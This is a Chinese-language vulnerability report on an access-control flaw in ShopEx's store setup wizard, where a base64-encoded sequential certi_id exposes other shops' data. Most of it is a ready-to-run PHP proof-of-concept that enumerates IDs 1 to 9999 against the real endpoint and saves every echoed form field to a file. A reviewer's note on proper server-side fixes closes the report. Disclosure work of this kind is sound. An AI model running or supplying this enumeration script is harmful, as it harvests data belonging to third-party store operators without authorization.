|
简要描述:
ShopEx 网店使用向导接口存在越权访问缺陷（IDOR）：`refer` 参数中的 certi_id 是顺序整数，改动它即可读取任意使用 ShopEx 程序的网站在向导页中回显的信息。
详细说明:
问题出现在 ShopEx 网店使用向导页面（guide.ecos.shopex.cn 的 step2.php）。
示例请求（原文中 URL 中段被省略，完整形式为 step2.php?refer=<base64>，见下方脚本）：
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
refer 参数仅为 base64 编码（并非加密），解码后得到：
{"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
certi_id 与 callback_url 均由客户端提供；下方的 PoC 脚本不携带任何 Cookie 或令牌即可得到响应。
将 certi_id 改为其他整数即可遍历所有使用了 ShopEx 程序的网站：服务端没有校验当前请求者是否拥有该 certi_id。下面的脚本按 1~9999 顺序枚举，并把页面中回显的文本输入框 name:value 保存到文件。
<?php
// Sweep candidate certi_id values 1..9999 and dump whatever the guide
// endpoint renders for each one (see ShowshopExD below).
// NOTE(review): the sweep works only because certi_id is a small sequential
// integer; 9999 is the PoC's guess at the ID space, not a value the page states.
$lastId = 9999;
for ($certiId = 1; $certiId <= $lastId; ++$certiId) {
    ShowshopExD($certiId);
}
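/**
 * Probe the ShopEx guide endpoint (step2.php) for one certi_id.
 *
 * The endpoint reads a `refer` query parameter that is only base64 over the
 * JSON object {"certi_id":N,"callback_url":"..."}. Both fields are supplied by
 * the client and this request carries no cookie or token, so any integer
 * certi_id can be asked for (IDOR). When the response echoes our refer (the
 * page rendered for that id), every <input type="text" name=".." value="..">
 * on it is printed as name:value and appended to $outFile.
 *
 * Changes from the original PoC: curl and fopen failures are checked,
 * the strpos() result is compared against false (a match at offset 0 was
 * previously treated as "not found"), inputs without both name= and value=
 * are skipped instead of raising undefined-index notices, the curl handle
 * is closed on every path, and the output path is a parameter.
 *
 * @param int|string $cid     certi_id to request; coerced with intval()
 * @param string     $outFile file the name:value pairs are appended to
 *                            (default kept from the original PoC)
 * @return void
 */
function ShowshopExD($cid, $outFile = 'c:/shopEx.txt') {
    $url = 'http://guide.ecos.shopex.cn/step2.php';

    // Same payload shape the site itself sends; intval() keeps the JSON valid
    // and prevents injecting extra keys through $cid.
    $refer = base64_encode('{"certi_id":' . intval($cid) . ',"callback_url":"http:\/\/www.a.com\/"}');
    $url .= '?refer=' . $refer;

    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
    // Bound the wait so one unresponsive request cannot stall the whole sweep.
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);

    $result = curl_exec($ch);
    curl_close($ch);

    if ($result === false) {
        // Transport failure: nothing to parse for this id.
        echo 'request failed for certi_id ' . intval($cid) . "\r\n";
        flush();
        return;
    }

    // The original author's console was GB2312 (Windows); convert before printing.
    $result = mb_convert_encoding($result, "gb2312", "UTF-8");

    // strpos() returns 0 for a hit at offset zero; test against false, not truthiness.
    if (strpos($result, $refer) !== false) {
        $fp = fopen($outFile, 'ab');
        if ($fp === false) {
            echo 'cannot open ' . $outFile . "\r\n";
        } else {
            preg_match_all('/<input\stype="text"(.*?)\/>/', $result, $value);
            foreach ($value[1] as $attrs) {
                preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/', trim($attrs), $res);
                if (!isset($res[1][0], $res[3][0])) {
                    continue; // input without both name= and value=
                }
                $col = $res[1][0] . ':' . $res[3][0] . "\r\n";
                echo $col;
                fwrite($fp, $col, strlen($col));
            }
            echo '--------------------------------' . "\r\n";
            fclose($fp);
        }
    }

    flush();
}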
漏洞证明:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
修复建议：refer 换成其他加密方式。
审阅者补充：仅更换 refer 的编码或加密方式并不能修复本问题——根因是服务端没有校验请求者是否有权访问该 certi_id，而不是参数可读。正确做法是在服务端把 certi_id 绑定到已认证的会话，或由服务端签发并校验带签名（如 HMAC）且有时效的 refer 令牌，同时对该接口做频率限制；只要攻击者拿到一个合法 refer 并改动其中的 ID 就能复用，任何客户端可复现的"加密"都挡不住枚举。
|